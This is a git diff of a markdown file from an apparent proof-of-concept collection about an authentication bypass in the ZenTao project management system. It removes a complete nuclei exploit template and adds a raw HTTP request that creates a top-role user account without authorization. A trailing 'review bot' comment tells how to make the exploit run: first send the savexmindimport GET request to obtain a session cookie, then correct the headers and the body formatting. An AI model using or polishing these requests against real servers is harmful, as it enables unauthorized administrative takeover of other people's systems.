diff --git a/禅道项目管理系统身份认证绕过漏洞.md b/禅道项目管理系统身份认证绕过漏洞.md
index dcc600a..7a72f9d 100644
--- a/禅道项目管理系统身份认证绕过漏洞.md
+++ b/禅道项目管理系统身份认证绕过漏洞.md
@@ -46,79 +46,14 @@ http: ## 添加用户poc ``` -id: easycorp-zentao-pms-idor-exp - -info: - name: 禅道项目管理系统身份认证绕过漏洞 - author: GuoRong_X - severity: critical - description: | - - 禅道系统某些API设计为通过特定的鉴权函数进行验证,但在实际实现中,这个鉴权函数在鉴权失败后并不中断请求,而是仅返回一个错误标志,这个返回值在后续没有被适当处理。此外,该系统在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。 - reference: - - https://mp.weixin.qq.com/s/hiGI_fQmXOHdkPqn6x00Jw - metadata: - verified: true - fofa-query: title="用户登录- 禅道" - tags: zentao -variables: - username: '{{rand_base(6)}}' - password: '{{rand_base(12)}}' - -http: - - raw: - - | - GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 - Host: {{Hostname}} - - - | - GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 - Host: {{Hostname}} - - - | - GET /biz/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 - Host: {{Hostname}} - - - | - GET /max/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 - Host: {{Hostname}} - - - | - POST /api.php/v1/users HTTP/1.1 - Host: {{Hostname}} - - {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"} - - - | - POST /zentao/api.php/v1/users HTTP/1.1 - Host: {{Hostname}} - - {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"} - - - | - POST /biz/api.php/v1/users HTTP/1.1 - Host: {{Hostname}} - - {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"} - - - | - POST /max/api.php/v1/users HTTP/1.1 - Host: {{Hostname}} - - {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"} - 
cookie-reuse: true - - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_5, "{{username}}") || contains(body_6, "{{username}}") || contains(body_7, "{{username}}") || contains(body_8, "{{username}}")' - condition: and - - extractors: - - type: dsl - dsl: - - '"USER: "+ username' - - '"PASS: "+ password' -# digest: 4a0a00473045022100f877e8e0df5985e15645227a3f12f66e08fe50250102f4df141f234afcc0e2e90220485c468e8de448c3e9c92875d8a1bd6d8fafffa0f294fffd4a4443e221e6de6b:58d4ffcb61df0489d6ab2fd018c17de6 +POST /biz/api.php/v1/users HTTP/1.1 +Host: 192.168.0.102 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Cookie: zentaosid=d95c19a900256b7dc3c3f1866b1d121c +{"account": "asda33", "password": "QQqq123456", "realname": "asda33", "role": "top", "group": "1"} ``` +![image](https://github.com/wy876/POC/assets/139549762/1c15070d-1563-4573-aff9-5da0da8c5848) + +
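Review bot: The replacement PoC drops the precondition the removed template carried: the template first issued `GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=...&branch=...` and only then posted to `/api.php/v1/users` with `cookie-reuse: true`, whereas the new block shows a lone `POST /biz/api.php/v1/users` with a `Cookie: zentaosid=d95c19a9...` header and never says where that session comes from. Presumably the POST alone is rejected on a fresh host, so the text should state the step, e.g. a line above the request: `First send GET /biz/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=1&branch=1 without credentials, then reuse the zentaosid cookie it sets in the POST below.` The request as written is also not valid HTTP: there is no empty line between the `Cookie:` header and the JSON body (the removed template had one), and `Content-Type: application/x-www-form-urlencoded` contradicts the JSON body that follows, so `Content-Type: application/json` plus a blank separator line is what a reader should paste into a proxy. Finally, the fixed `asda33` / `QQqq123456` replace the template's `{{rand_base(6)}}` / `{{rand_base(12)}}`; a second run against the same host will presumably collide on the existing account, and the PoC leaves a `role: top` user with publicly known credentials on the target, so the text should tell the reader to change both values and delete the account after testing.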